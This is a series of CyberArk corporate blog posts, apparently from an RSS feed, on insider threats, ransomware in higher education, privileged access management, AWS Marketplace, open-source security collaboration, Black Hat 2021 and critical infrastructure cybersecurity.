The study explored three primary insider threat profiles: negligent insiders (those who unintentionally cause issues), criminal and malicious insiders (those who intentionally cause damage) and credential thieves (those who target login information to gain unauthorized access to applications and systems). Of these three profiles, the study found credential thieves cost organizations an average of $871,000 per incident — three times the cost of a negligence-driven incident. While most insider threats were non-malicious, accidental flubs, they represented a key vulnerability — and resource drain.

Meanwhile, the 2021 Verizon Data Breach Investigations Report (DBIR) found that 99% of incidents classified under the “privilege misuse” category were driven by internal actors. As the report states, “This pattern is an uncomfortable one — this is where the people we trust betray us.” The DBIR found financial gain to be the most common motivator at 67%, yet it revealed several other drivers: fun (17%), a grudge against the employer (14%), espionage (9%), convenience (3%) and ideology (1%).

The insider threat is very real, very hard to spot and makes balancing efficient daily workflows and stringent, always-on security a real challenge. It’s all fun and games until you find yourself alone in the electrical bay with an imposter — figuratively and/or literally, as the case may be.

The Insider Security Conundrum

Ironically (or not), one of Among Us imposters’ more popular “kill zones” is in the vessel’s security room. While crew members are in the room surveilling other areas via security cams, they can’t see what’s happening right behind them.

Working undercover is precisely how insider threats operate, and it’s what makes them so difficult for cybersecurity experts. By focusing on keeping the bad guys out, it’s easy to miss what’s right over your own shoulder. And these threat actors have a leg up — the most crucial thing outside attackers are looking to acquire is something that insiders already have, and that’s legitimate access. Using stolen credentials from other corporate identities, insiders can easily move throughout systems, elevating their access and worming further into privileged systems to steal data or use it in ways they shouldn’t.

Before devising a strategy for shoring up security measures against threats in your own house, it’s important to consider where this responsibility ultimately falls. Is it solely the purview of the info security teams? Or do HR and legal bear some responsibility since insider threats track back to hiring and potential employee vetting? The answer, like so much involved in the digital world, is the more communication and cooperation you have between departments and leadership, the better equipped you will be to uncover and mitigate threats from within. To revisit our Among Us analogy, the fewer dark rooms and unmonitored pathways you have, the less likely malicious actors will be able to move about undetected. Shining those lights is vital.

No Trust, No Sus

The rise of remote and hybrid work, cloud usage and increased reliance on alternate means of employee connection — the very elements that helped fuel the popularity of communal games like Among Us — has caused the scope and consequences of insider threats to explode.

In this new reality, you can’t simply separate the “good” guys from the “bad” guys because they often look alike. What’s more, sometimes a person will start out as one and eventually become the other. The solution is to trust no one until you can continuously verify that they are who they say they are. This means there are no darkened rooms, no hidden vents and far less uncertainty that when someone unlocks and enters a specific “room,” they are there to do their assigned task and nothing else.

This “Zero Trust” approach for every type of identity — human insiders, human outsiders, machine users, applications and even devices — goes a long way in proactively managing insider threats by limiting disruption, strengthening security resilience and protecting resources — particularly in hybrid cloud environments. The threat may be coming from inside the house, but the security measures in place go well beyond a few doors and walls.

Zero Trust would make Among Us far less fun to play for sure, but it makes operating in our new boundary-less world a whole lot safer. Tricking your friends with casual sabotage can be fun when it’s a game, but it’s much less so when millions of dollars and reams of sensitive data are at stake.

*Among Us is created and distributed by InnerSloth LLC

]]>
A Lesson on Higher Education Cybersecurity Risks  https://www.cyberark.com/blog/a-lesson-on-higher-education-cybersecurity-risks/ Tue, 31 Aug 2021 13:00:08 +0000 https://www.cyberark.com/?p=122716

U.S.-based education institutions continue to grapple with major challenges brought by the pandemic: the largest enrollment decline seen in a decade, swirling controversy over reopening physical classrooms, outmoded IT infrastructure that’s sagging under the pressure of digital teaching and learning, and near-crippling financial constraints. As the new school year begins, cyber attackers are expected to take advantage of the confusion and highly vulnerable state of the industry.

Ransomware is hitting the education sector particularly hard. Consider these recent statistics:

  • The Sophos State of Ransomware 2021 report found the education sector was the industry hardest hit by ransomware in 2020.
  • Last year, ransomware was responsible for 80% of malware-related incidents in the education services sector, according to the latest Verizon Data Breach Investigations Report.
  • A Check Point study found that the global education sector is the most targeted industry for malware and ransomware attacks in 2021 thus far. In July 2021 alone, researchers recorded an average of 1,739 attacks per organization per week.

Michigan State University was just one of the many institutions targeted recently, yet it’s one of the few that have come forward publicly about the attack that hit its department of physics and astronomy. The school did not pay the $6 million ransom demanded by the attackers but ran up more than $1 million in costs repairing and remediating its IT system. The university has been widely applauded for its transparency and is credited for educating the broader community about ransomware and other cybersecurity threats.

It’s Academic

In our latest CyberTalk with CyberArk podcast, Matt Kenslea, director, State, Local and Education (SLED), CyberArk, talks about higher education’s unique cybersecurity conundrum.

Universities’ “needs are different and unusual compared to commercial entities and government agencies,” he noted. Unlike other organizations, they have the autonomy to research and govern independently, but this also means that they shoulder the burden of securing massive troves of sensitive research data. The irony is that in many cases, these research and technology pioneers have limited means to implement effective cybersecurity for themselves, Kenslea said. “We need to focus and meet them where they are.”

“I saw a report recently where the FBI ranked higher ed as the number one target industry with ransomware, higher than financial services, which has historically been the market leader,” he noted. “This is a prize you don’t want to win.”

The FBI has also indicated that U.S. college campuses’ “open environments” make them especially vulnerable to cyber attackers using various methods to “steal information or products, bypass expensive research and development, recruit individuals for espionage, exploit the student visa program for improper purposes and spread false information for political or other purposes.”

Perimeter Evolves and Dissolves, Security Doesn’t Always Keep Up

Colleges are inherently collegial. They thrive on in-person contact in the office among administrators, faculty and students. When COVID -19 hit, colleges had to shift quickly to convert from an office-/classroom-driven operation to remote learning/remote work.

As a result, college IT departments “ran out and bought laptops for the first time. They installed anti-virus (AV) software and some form of multi-factor authentication (MFA),” Kenslea observed. But there was the sense that in the rush, they did not get security down right or did not implement it thoroughly as they would have had the process been more deliberate, thorough and comprehensive.

“Most colleges have not had a remote workforce before,” Kenslea said. “Increased reliance on cloud services and numerous personal networks and devices used beyond the physical campus definitely expand their perimeter and increase risk.”

This is very much on the front burner of concern among college IT leaders. In a Horizon Report® surveying the near future of college IT, information clearinghouse Educause found that fewer than half (47%) agreed their cybersecurity team is prepared to protect their evolving security perimeter.

This dissolving perimeter offers a target-rich environment for attackers. Start with the people working in higher ed: “Deans, the president, the CFO, the bursar, the provost… there are a lot of people with privileged access to a lot sensitive data and systems,” Kenslea said. “What’s more, there are faculty who pursue and win grants and set up separate environments for their research completely outside of IT and security’s control.”

Such a roster is ideal for spear-phishing campaigns designed to steal or compromise an identity, or trigger a ransomware attack. Sometimes attackers will email students to reveal they’ve obtained their personal data, instructing them to contact administrators and urge them to pay the ransom, Kenslea explained. This puts the school in an impossible situation: pay and take a financial hit, or don’t pay and suffer reputation loss, which often leads to decreased enrollment and financial hardship.

Another point of vulnerability is the visiting professor. “They get provisioned with privileges to access sensitive resources on the network. Who knows how long they are going to be there?” Kenslea said. “Someone has to remember to de-provision them when they leave.” If the account is left dormant, it could become another avenue of attack.

The culture of openness that defines a college must be tempered with Zero Trust. “What we talk about is controlling, through least privilege, what a user can do on the machine, and how long they can do it without rechecking their access rights.” Kenslea said. The right approach must not break user workflows or generate tech support tickets; otherwise, users can’t accomplish anything because security is too onerous.

“There has to be a balance between security and usability,” Kenslea said. “You want systems that are adaptive, are protecting your endpoints, are managing your privilege, and are isolating users and sessions so that they can’t go out and cause problems.”

The Blueprint Drives the Playbook

So how can higher education institutions more effectively secure their campus IT systems? Kenslea offers some prescriptive steps in our podcast, based on the CyberArk Blueprint for Identity Security Success.

First, he noted, you must “assume breach” and shift your attention to stopping credential theft and subsequent movement throughout the environment.

Then, place emphasis on securing high-value targets, such as domain administrators and cloud administrators, via Privileged Access Management controls like password vaulting and rotation. “Session isolation and ephemeral access can also be used to narrow the scope of the breach, limiting the time an attacker has to move through the system, laterally and vertically,” he noted.

From there, lock down all the common platforms and systems, whether it’s the active directory, server accounts or workstations to “really get across the entire environment,” Kenslea said.

“Finally, make sure least privilege is enforced across all servers, workstations and users — paying special attention to removing local admin rights and implementing adaptive multi-factor authentication and layered endpoint protection,” he added.

“It’s a scary world out there. You don’t want to face it alone.”

Check out the entire CyberTalk with CyberArk episode to hear why now is the time for higher education to get with the (cybersecurity) program.

]]>
Ask These Questions Before Investing in Privileged Access Management https://www.cyberark.com/blog/ask-these-questions-before-investing-in-privileged-access-management/ Fri, 27 Aug 2021 13:00:37 +0000 https://www.cyberark.com/?p=122591 Ask These Questions Before Investing in Privileged Access Management

Identity and privileged access security challenges aren’t anything new — the pages of history are filled with tales of deception and fraud. During the Trojan War, the Greeks disguised their soldiers by putting them in a wooden horse to successfully infiltrate the city of Troy. In 16th century France, a penniless imposter claimed the identity, sizable property and wife of a man named Martin Guerre — and got away with it until the real Martin Guerre showed back up in town several years later. In the early 1900s, American fraudster Frederick Emerson Peters bamboozled banks all over the country with bad checks, impersonating celebrities, authors and even presidents. And the list goes on and on.

Fast-forward to present day, and identity and privileged access issues in the enterprise have only grown in complexity thanks to pervasive digital technology, cloud migration, new ways of working and continued attacker innovation. In both random and targeted strikes, identity compromise and manipulation of privileged access have become key elements of modern cyber attacks. According to the Identity Defined Security Alliance (IDSA) 94% of organizations have experienced an identity-related breach at some point. To eliminate security gaps, many cybersecurity teams are evolving their programs by taking a least privilege view of identity-related risk, with Privileged Access Management at the core of their Identity Security strategy.

Your security team recognizes the need for technology solutions that can be flexibly deployed to help secure identities and protect high-risk privileged access across on-premises, cloud and hybrid environments. But if your business is like most, it’s evolving so rapidly that it can be difficult to articulate your exact technology requirements during the evaluation and procurement process (let alone anticipate future needs).

This list of key questions and considerations can help guide IT security decision-makers by simplifying the process of evaluating and selecting the right technology vendor and tools to help you accomplish your identity and Privileged Access Management goals.

Six Questions to Ask Your Potential Identity and Privileged Access Management Provider  

1. Can it Support a Hybrid Infrastructure?

The right Privileged Access Management solution enables an evolving set of hybrid technologies that drive operational efficiencies across all identities, infrastructure and applications for hybrid, multi-cloud and SaaS workloads. To help ensure full coverage and compliance, ask if the solution can:

  • Seamlessly connect users (both human and machine) to resources across on-premises, hybrid, multi-cloud and SaaS workloads in an efficient and cost-effective manner
  • Help you conform with customer compliance and privacy expectations through tools and services that are recognized and trusted by regulators, auditors and authorizing officials
  • Integrate with your existing applications, along with new and evolving infrastructure to maximize your IT investments

2. Can it Support Diverse Transactions and Align to Digital Transformation Objectives?

Businesses are embracing DevOps to transform software development and robotic process automation (RPA) to extend the power of automation into new realms. By integrating with automation, scripts and workflow-oriented application program interfaces (APIs), your Privileged Access Management solution can help you take full advantage of digital transformation’s efficiency and productivity benefits — without jeopardizing cybersecurity. Ask if it can:

  • Consistently manage the many embedded credentials among DevSecOps, cloud and traditional applications
  • Enable secure vaulting and management of privileged account credentials used by software robots and RPA administrators
  • Support automated application lifecycle management to boost productivity and minimize IT delays
  • Enable just-in-time privileged access through shared accounts and a break glass approach

3. Does it Prioritize the End-User Experience?

People are a critical part of securing the enterprise. Any process that adds complexity or burden to managing and protecting privileged access brings additional risk, reduces productivity and impedes effectiveness. To gauge the potential impact on users’ access experience, ask if the solution can:

  • Make it easy for users to “do the right thing” when it comes to security by balancing intuitive, frictionless access and strong Identity Security controls
  • Monitor and secure remote access to maximize effectiveness while enforcing least privilege requirements
  • Support self-service capabilities and automated workflows to help users stay efficient and productive
  • Be deployed through a cost-effective, flexible SaaS model to help minimize internal operational burden and cost

4. Can it Prepare You for Tomorrow’s Challenges Today?

Identity itself is evolving, as sensors and operational technology join microservices, software robots and virtual services. The most effective solution will help ensure continued alignment with both your security needs and digital business opportunities of tomorrow. Ask if the technology provider can:

  • Demonstrate business acumen for strategic acquisitions and a strong R&D pipeline to address emerging threats and use cases
  • Draw upon industry-leading threat researchers dedicated to examining emerging attack techniques to drive improvement for the security community

5. Can it Help Defend Against Advanced and Evolving Threats?

The U. S. National Security Agency recommends that organizations consciously operate and defend resources as if the adversary already has a presence within the environment. In this “assume breach” model, the right solution must assume every transaction is untrusted until verified. Ask if the provider and solution can:

  • Apply least privilege practices through dynamic security policies to secure all identities – human and machine – from end-to-end
  • Enable a Zero Trust approach that leverages adaptive authentication and authorization, supported by a tamper-proof audit trail of all activity
  • Provide measurable risk reduction and reduced costs through a successful and continually improving program framework

6. Can it Support a Broad Ecosystem?

Because identity is the thread that binds every facet of an enterprise’s information and technology infrastructure, the right solution should demonstrate the ability to interoperate with a broad array of applications, services and providers. To help minimize future technical debt and stranded technologies, ask if the provider can:

  • Demonstrate an alliance of third-party integrations to help preserve the value of your existing IT assets and services
  • Support integration through an extensible platform for everything from homegrown applications to external services
  • Easily integrate via trusted industry standards and protocols like SAML, REST and OAUTH

Your data is one of your business’s most critical assets — yet it’s likely dispersed across a complicated web of in‑house, online and external systems. The right Privileged Access Management solution must be able to consistently protect that data against identity-based threats to confidentiality, integrity and availability.

When you consider the importance of securing privileged access to that critical data, the experience of the technology vendor matters — and should be evaluated with the same rigor as the tool itself. The right partner must be able to demonstrate a solid product approach, proven execution track record, flexible deployment models, customer service excellence, consistent recognition by leading analysts and industry experts and a stable corporate presence.

Refer to these questions during your vendor evaluation process and again as you build out your strategy for managing privileged access, monitoring transactions and mitigating threats. And for a deeper dive into evaluation considerations, download “The Buyer’s Guide to Securing Privileged Access.”

]]>
CyberArk on AWS Marketplace: Driving Faster Time-to-Value for Customers and Partners https://www.cyberark.com/blog/cyberark-on-aws-marketplace-driving-faster-time-to-value-for-customers-and-partners/ Tue, 24 Aug 2021 12:35:48 +0000 https://www.cyberark.com/?p=122379 CyberArk on AWS Marketplace: Driving Faster Time-to-Value for Customers and Partners

Migrating workloads to the cloud is a top priority for many organizations, and businesses everywhere are using Amazon Web Services (AWS) to accelerate IT service agility, simplify operations and minimize capital equipment expense and complexity. In this cloud-delivered world, organizations are looking for SaaS-delivered security solutions — along with easier ways to consume them — to protect against identity-centric attacks across modern IT environments and support their increasingly hybrid workforces.

Since we couldn’t be together for AWS re:Inforce this summer, we’re revisiting a 2021 Impact Live conversation with Matt Girdharry, leader for DevOps, Observability & Security, AWS Marketplace, Amazon Web Services; Chris Moore, CyberArk VP of global channels; and Joanne Wu, CyberArk VP of business development. The trio explored how organizations can best leverage CyberArk, our partner ecosystem and AWS Marketplace to drive faster time-to-value and rapid risk reduction.

Modernizing the Digital Supply Chain

“A typical customer today has about 1,000 applications that they’re thinking about migrating over to AWS,” said Girdharry. “As they’re taking the core applications they’ve built — the lifeblood or IP of their organization — and figuring out how to re-architect them, they’re also thinking, ‘How do I take these on-prem third-party applications that have been running in my data centers and migrate them with me?’”

They have an opportunity to do just that through AWS Marketplace, unlocking the benefits of AWS for the security technologies and services they already know and trust. “Customers love the fact that they can modernize their core IP applications along with their supply chain through SaaS-based subscriptions,” Girdharry continued.

“AWS and CyberArk have been working together for several years across three major dimensions: Securing the cloud, running CyberArk Identity Security solutions in the cloud and, most recently, helping organizations around the world to procure through AWS Marketplace,” explained Wu.

The AWS Marketplace also enables CyberArk channel and C3 Alliance partner organizations to drive new customer value by simplifying business transactions. “As organizations adopt cloud computing and digitally transform their business, our partners need to deliver solutions in the way that their customers want to buy them,” said Moore. “By leveraging the AWS Marketplace, our partners are in the best position to deliver real and rapid value and continually meet evolving customer needs.”

CyberArk’s focus on AWS Marketplace facilitates CyberArk’s ongoing transition to deliver enhanced customer value and greater deployment flexibility and simplicity through a subscription-based model. As Moore specified, selling through AWS Marketplace “aligns incredibly well with our own shift to SaaS. From the channel and partner side, it’s all about eliminating friction.”

A Whole That’s Greater Than the Sum of its Parts

Perhaps the best way to illustrate the value that AWS Marketplace delivers to organizations is through the Amazon “flywheel” — a concept first popularized by author Jim Collins and embraced by Jeff Bezos to elevate the customer experience.

The flywheel’s hallmark characteristic is that no one thing powers it. Instead, it moves by many components acting in concert — equating to a whole that’s greater than the sum of its parts. AWS Marketplace delivers customers increasing selection to tools to increase performance across security and compliance functions. Simultaneously, vendors increasingly benefit from greater intelligence based on adoption of customer features, allowing teams to accelerate their innovation, and in turn, make AWS Marketplace even more valuable for customers.

Breaking Down the Cloud Shared Security Responsibility Model

It’s important to remember that when it comes to security, everyone has a part to play. Under this shared responsibility model, the end-user is responsible for certain Identity and Access Management (IAM) functions, including Privileged Access Management. Organizations can fulfill their security responsibilities by using CyberArk’s SaaS-based Identity Security solutions on AWS Marketplace to:

“Security and compliance are a shared responsibility,” explained Girdharry. AWS is responsible for protecting the global infrastructure that runs all of the services offered in the AWS Cloud. For abstracted service, such as Amazon S3 and Amazon DynamoDB AWS is also responsible for the security of the operating system and platform. Customers and APN Partners, acting either as data controllers or data processors, are responsible for anything they put in the cloud or connect to the cloud.

He continued, “Our philosophy at AWS Marketplace is that we’re not going to leave you hanging — we’re going to supply you with the best possible security tools, including solutions from CyberArk that actually help you perform that piece of your responsibility as a customer.”

This support extends to digital organizations’ expanding DevOps practices. As many companies move away from monolithic, virtual machine-based worlds and modernize to microservices, DevSecOps becomes extremely important. “CyberArk plays a huge role in that in terms of providing the right types of access, to the right pieces of that code production pipeline, all the way up into the production environment,” said Girdharry.

CyberArk’s cloud and DevOps experts are also actively involved in numerous AWS-led open source and code donation projects that enable developers and help organizations securely meet their objectives.

Visit CyberArk on AWS Marketplace

Embracing cloud, remote work and other digital transformation initiatives cannot be a tradeoff with security. With access to CyberArk Identity Security solutions on AWS Marketplace, organizations can move forward with confidence.

CyberArk offerings on AWS Marketplace include CyberArk Privileged Access Manager, CyberArk Endpoint Privilege Manager, CyberArk Cloud Entitlements Manager, CyberArk Privilege Cloud, CyberArk Workforce Identity, Conjur Secrets Manager Open Source and CyberArk Privileged Access Manager for GovCloud (US). To learn more, visit CyberArk on AWS Marketplace.

]]>
How Collaborative Cybersecurity Is Disrupting Disruption https://www.cyberark.com/blog/how-collaborative-cybersecurity-is-disrupting-disruption/ Fri, 20 Aug 2021 13:00:27 +0000 https://www.cyberark.com/?p=122356

Out of a period of severe, real-world disruption came disruption’s polar opposite: cooperation. For a long time, cybersecurity seemed to be an area that needed to be shrouded in mystery. Don’t let others know your weaknesses, and don’t erode trust in your services by revealing breaches. But this tendency only served to make efforts to increase security and thwart attackers muddier and more vulnerable.

When COVID-19 showed the world true and thorough disruption, everyone was shaken out of their comfort zone and, as the recent White House Executive Order made clear, the only path forward was consistent and transparent communication and teamwork within the cybersecurity community.

Effective cybersecurity collaboration — to build resilience and protect the people and organizations that rely on us — is possible. And taking a page from the open source community, which has been doing this for years, is a great place to start.

Open Source Collaboration: Offshoot of a New Normal?

Open source has transformed software development by bringing diverse minds, experiences and approaches together to tackle a wide range of challenges — and make solutions universally accessible. It’s grounded in the notion that no one can whistle a symphony; it takes a whole orchestra to play it. Disruptive open source innovations like Docker, Kubernetes, Ansible and Jenkins prove this is so.

According to a 2021 Red Hat study, 90% of IT leaders use enterprise open source today, citing IT infrastructure modernization (64%), application development (54%) and digital transformation (53%) as top use cases. And for these leaders, a team mentality matters, with 83% indicating they’re more likely to select a software vendor that contributes to open source projects.

Our CyberArk team has long been active in — and inspired by — the open source community. In 2019, we introduced CyberArk Commons, an open forum for developers, engineers and security professionals. We spoke with CyberArk DevOps security engineer Joe Garcia — one of the forum’s founding members — about how CyberArk Commons has evolved in the “new normal” and how this community-centric approach has shaped his own development philosophy.

“The need to share information more openly and more rapidly has increased at the rate of attacker innovation,” says Garcia. “Everything is so much faster. It doesn’t take eight hours to compile an application anymore. Attackers are watching secrets come through in real time and trying them out, so you don’t have 15 minutes to rotate that password after you onboard it. It better be done before it even hits the wire because they’re going to find it.”

CyberArk Commons became a place where developers across the industry — predominantly working remotely and independently as a result of the pandemic— could gather to talk shop, seek advice, float ideas and build secure applications even faster. And, collaboratively cut through disruption.

Structured like a traditional online forum, the Commons offers sections for general conversation, news and announcements and inquiries about specific DevSecOps tools like Conjur Secrets Manager Open Source, Conjur Secrets Manager Enterprise and Summon. Members can also dig into cutting-edge cybersecurity research and explore the many community contributions on the CyberArk Marketplace.

As Garcia explains it, CyberArk Commons is “… geared toward developers who recognize that securing their secrets is the first line of defense against DevOps pipeline attacks.” Because of COVID-19, many are working outside the protected ‘walls’ of their organizations’ networked environments for the first time — and they’re being targeted through spear-phishing, impersonation and other methods with increasing frequency.

Culture is a huge part of software engineering, and the abrupt shift to remote work has deprived developers of the ability to quickly brainstorm or bounce ideas. “Instead, they’re going to all these other websites and posting their source code up,” Garcia explains. “The last thing we want are hard-coded secrets leaking out in that code.”

DevOps Security Community Service

Garcia stumbled into the DevOps security field in unusual fashion. One of the largest financial organizations in his home state of Florida was hiring, and he decided to apply.

“The first question they asked me was ‘Have you ever used PowerShell?’” he recalls with a laugh (the answer was no). The second was, “What’s your weakest skill?” — to which he replied, “Numbers.” So naturally, he got the job and was tasked with using PowerShell to automate Identity and Access Management (IAM) processes and data analysis across the organization’s information security department.

In his words, he quickly “learned how I learn” — by drinking directly from the proverbial fire hose. And he’s never stopped learning. Now a prolific open source contributor with an A+ GitHub ranking and a dedicated technical following on YouTube, Garcia is quick to recount the many times the community has helped him overcome a challenge or enhance an existing project.

“Everything that I do comes from the community, one way or another,” Garcia says. He uses the example of cyber-cli, a “Swiss army knife” command-line interface (CLI) that marries APIs across the CyberArk Identity Security Platform to simplify human and non-human interaction. “We received feature and issues feedback from both CyberArk employees and community members — I’ve even gotten pull requests from the community on this. The contributions for these community-driven projects have been fantastic.”

When it comes down to it, a nimble and communicative community only enhances cybersecurity efforts — and the approach of “we can all learn from one another” fortifies defenses, considering an ever-shifting and ever-accelerating threat landscape. The elimination of proprietary information and the removal of gate-keeperism between developers enable security teams to be better equipped to move at the speed of attack.

“There’s a lot of scary stuff out there happening so rapidly because of all of the cloud-native stuff. Attackers don’t need to manage infrastructure. They’ve got cloud services doing it for them,” says Garcia. “So, we’ve got to be just as quick as them,” he says. To disrupt the disruption, as it were.

Unveiling the “Secret” to Securing Secrets in Automation Environments

As sophisticated cyber attackers target application code and DevOps pipeline tools, the need to shift security left is widely understood. But what are the best ways to do this within an automation environment to speed processes and beef up security?

Find out in Garcia’s presentation “Red Hat + CyberArk: A Reference Architecture for Securing Ansible Automation & CI/CD Pipelines” at AnsibleFest 2021, taking place virtually September 29-30.

Organizations around the world use Ansible and CyberArk’s integrated solution to streamline the rotation and management of secrets and privileged credentials, and automate the prevention and remediation of high-risk activities. In his session, Garcia and co-presenter Roland Wolters, principle technical marketing manager at Isovalent, will detail the Red Hat Ansible Automation Platform and CyberArk reference architecture, elaborate on best practices used by organizations for layering security into their automation platforms and share proven tips for avoiding potential pitfalls along the way.

 

]]>
Black Hat Reflections: Supply Chain Attacks, Zero Days and Disclosures https://www.cyberark.com/blog/black-hat-reflections-supply-chain-attacks-zero-days-and-disclosures/ Wed, 18 Aug 2021 13:00:56 +0000 https://www.cyberark.com/?p=122267 Black Hat Reflections: Supply Chain Attacks, Zero Days and Disclosures

Black Hat 2021 had a markedly different tone from previous years. Welcoming remarks explored the strong parallels between cybersecurity and COVID-19 prevention, with founder Jeff Moss asking “…what are you doing to try to confer an immunity to those around you?” and urging the security community to be part of the solution.

Whether you ventured to Vegas or tuned in from afar, the thought-provoking questions and content continued throughout the event. Here are some topics that particularly stood out to me:

Ransomware Supply Chain Targets Aren’t Always the Real Targets

Throughout the event, supply chain attacks dominated the conversation. Opening keynote speaker Corellium COO Matt Tait painted a sobering picture of the near-future, warning that what we’ve seen is “peanuts” compared to what’s coming. Instead of using “spray and pray” tactics, attackers — and ransomware actors in particular — are targeting very specific organizations for very specific reasons. And they’re using upstream providers like Kaseya to reach them. Tait also noted that the number of zero days being exploited by attackers is “off the charts,” reaching levels not seen in the past eight years. Why? They’re scaling their attacks, pulling out all the stops and moving at incredible speed.

The Malware-as-a-Service Market Is Thriving

While attacks are growing in sophistication and scale, there are still plenty of threat actors going after “low-hanging fruit.” For instance, the dark world of malware-as-a-service (MaaS) is alive and well, providing nefarious characters with easy access to popular credential theft malware, one of the most prevalent types of malware used in cyber attacks today. The main objective of nearly all credential theft malware is to gather as much confidential and sensitive information (like user credentials and financial information) as possible. Popular credential stealers, such as Oski Stealer, are cheap to buy and can be operationalized easily — with little to no technical skills required.

Identity’s Leading Role in Major Breaches

The cybersecurity community needs to collaboratively innovate to move as fast as our adversaries — and embracing an attacker’s mindset is a crucial starting point. In my Black Hat talk, “The Anatomy of a Breach with CyberArk Labs: Supply Chain and Privilege,” we did just that by deconstructing the phases of recent supply chain attacks — from initial infection and customer targeting through privilege escalation and exfiltration. By examining revelations from these attacks, it’s clear that the compromise of identity and subsequent manipulation of privileged credentials were instrumental in their success. To build effective cybersecurity strategies, you have to assume that any identity in your network may be compromised. And instead of trying to keep the “bad guys” out, you can focus on protecting what they’re after.

The Disclosure Debate Reignites

Speaking of identity compromise, criminal enterprises are increasingly reliant on vulnerable web applications to harvest credentials and launch their attacks. Navigating the internet’s many hidden dangers is a challenge for consumers and security researchers alike. So, it was no surprise that tools that can search across websites for vulnerabilities and aggregate threat information on exploitable flaws at scale created buzz, and even some controversy, at Black Hat. The debate boiled down to this: Attackers are innovating in lockstep with defenders. Do well-intentioned vulnerability disclosure tools give them an edge?

Cloud Apps Now the “Holy Grail” for Espionage Attackers

As organizations shift more data to the cloud, nation-state attackers are setting their sights on popular SaaS applications as they work to exfiltrate sensitive information. With motivations that reach far beyond financial gain, these types of attacks often require stealthy, long-term persistent access in cloud environments. At the conference, researchers presented a series of novel and sophisticated attack techniques seen in the wild — one of the most notable being Golden SAML, first discovered by CyberArk Labs, and used in the massive SolarWinds supply chain attack.

Passwordless Authentication Risks We Now “Face”

Biometric authentication is gaining traction in the enterprise to help mitigate the numerous security risks inherent with password use. But, considering most of our faces are out in the public domain, passwordless login features are not fail-safe. Our own CyberArk Labs security researcher Omer Tsarfati presented his talk, “Bypassing Windows Hello for Business and Pleasure,” on how to circumvent Microsoft’s Windows Hello biometric authentication using a spoofed USB webcam, in what PC Mag called one of the “scariest things” seen at this year’s show. Read more about his research here.

Open Source Tools Aid Containerized Environment Testing

Managing containerized workloads and services is top of mind for many DevOps teams today and according to a recent Cloud Native Computing Foundation (CNCF) survey, more than 78% of organizations rely on Kubernetes as their container orchestration platform. This year, multiple Black Hat sessions focused on finding and mitigating vulnerabilities in these dynamic environments — with community-sourced tools that aid pen testers and Red Teamers in pinpointing threats generating significant interest.

Biohacking Is the New Frontier 

The threat research and tools presented at Black Hat are essential in helping security professionals protect against digital threats. But what happens when they come up against someone who is both the attacker and the attack vector? My CyberArk colleague Len Noe took Black Hat attendees deeper into the mind of an attacker: from a rogue employee sporting an implanted RFID microchip to secretly store sensitive data and files to the malicious outsider who conceals an entire Linux system beneath their skin to pass every physical and digital security check and make off with your most valuable corporate assets. While it sounds like a science fiction novel, it’s real life today. Are you ready?

]]>
Critical Infrastructure Cybersecurity Gets its Invisible Spotlight https://www.cyberark.com/blog/critical-infrastructure-cybersecurity-gets-its-invisible-spotlight/ Fri, 13 Aug 2021 13:00:54 +0000 https://www.cyberark.com/?p=122181 Critical Infrastructure Cybersecurity Gets its Invisible Spotlight

While the federal government cannot command private industry, it can provide direction and drive urgency. To this end, the Biden Administration recently issued a new National Security Memorandum (NSM) outlining steps to safeguard the country’s critical infrastructure. This follows a series of government actions, including the May 2021 Executive Cybersecurity Order and 2020 Certified Maturity Model Certification (CMMC) roll out, which may “sound bureaucratic, but that have teeth,” to quote Washington Post’s David Ignatius.

During a recent speech at the Office for the Director of National Intelligence, President Biden warned that ransomware and other cyber threats “increasingly are able to cause damage and disruption in the real world,” according to Financial Times. “If we end up in a war, a real shooting war with a major power, it’s going to be as a consequence of a cyber breach,” he continued.

The latest directive is purely voluntary and collaborative, as about 85% of U.S. IT infrastructure resides in the private sector, beyond Washington’s command. Still, the Industrial Control System Cybersecurity Initiative calls for the federal government to “create a path” for government and industry to take action “within their spheres of control to address serious threats.” The Department of Homeland Security will be issuing preliminary sector-specific cybersecurity goals by September 22, making them final one year later. A parallel legal study suggests the government may push to make these requirements legally binding in the future, reports CSO.

Historically, such proposed regulations have met resistance. Yet on the heels of major breaches from SolarWinds to Kaseya, the stakes have never been higher. At Black Hat USA, Scott Shackelford, cybersecurity program chair at Indiana University and Christopher Hart, former chairman of the National Transportation Safety Board (NTSB), called for a middle ground of sorts in the form of a national cybersecurity safety review board — an independent agency similar to the NTSB — that could investigate major cyber incidents to find out why they happened and even subpoena organizations, when necessary, to help prevent them from happening again.

Critical Infrastructure: A Broad Definition and Target-Rich Environment

The U.S. Cybersecurity and Infrastructure and Security Agency (CISA) identifies 16 critical sectors that need to improve cyber defenses: chemical, commercial facilities, communications, critical manufacturing, dams, defense industries, emergency services, energy, financial services, food and agriculture, government facilities, healthcare, IT, nuclear power, transportation and water/wastewater. This designation of “critical infrastructure” in the U.S. is much broader than in other parts of the world, such as the EU, which recognizes only seven sectors.

All these critical sectors rely on computerized operating technology (OT) to function, which is fast converging with IT and exposing critical industrial control system (ICS) endpoints and other assets to aggressive threats like ransomware.

Add to that remote access, the Internet of Things (IoT) and the cloud — and the attack surface increases significantly, allowing more opportunities for attackers to get into IT/OT systems. A successful attack on critical infrastructure could disable or destroy production lines and industrial processes, leave cities in the dark or shut off critical lifesaving technologies.

Corporate IT executives are aware of the hazards. A 2020 Ponemon Institute survey of more than 2,500 cybersecurity practitioners responsible for protecting OT systems found 57% believed they will face one or more attacks, while almost half believe that the risks are higher for OT systems than IT systems. Slightly more than six out of 10 believed that OT and IT security efforts are not aligned. Nearly half also said that the threat to OT systems is increasing. They identified the three biggest threats: phishing, ransomware and denial-of-service attacks. One-third admitted that their companies suffered the loss of OT-related intellectual property as a result of previous attacks.

The challenge is enormous. During his Black Hat talk (you can check out slides here), Shackelford asked, “Here in the states, given our broad perspective on critical infrastructure, if everything is critical, how can we best coordinate our expertise and resources to defend vulnerable critical infrastructure against the huge array of cyber-enabled threats, including ransomware, that we’ve seen recently?”

The Need for Night Vision

One thing is clear, as the Biden memo states: “We cannot address threats we cannot see; therefore, deploying systems and technologies that can monitor control systems to detect malicious activity and facilitate response actions to cyber threats is central to ensuring the safe operations of these critical systems.”

Most critical infrastructure companies operating with legacy security measures are in the “blind” position. They cannot defend against threats they cannot see and only know if they have been attacked after the damage is done. This could be weeks, months or even years after suffering an initial intrusion.

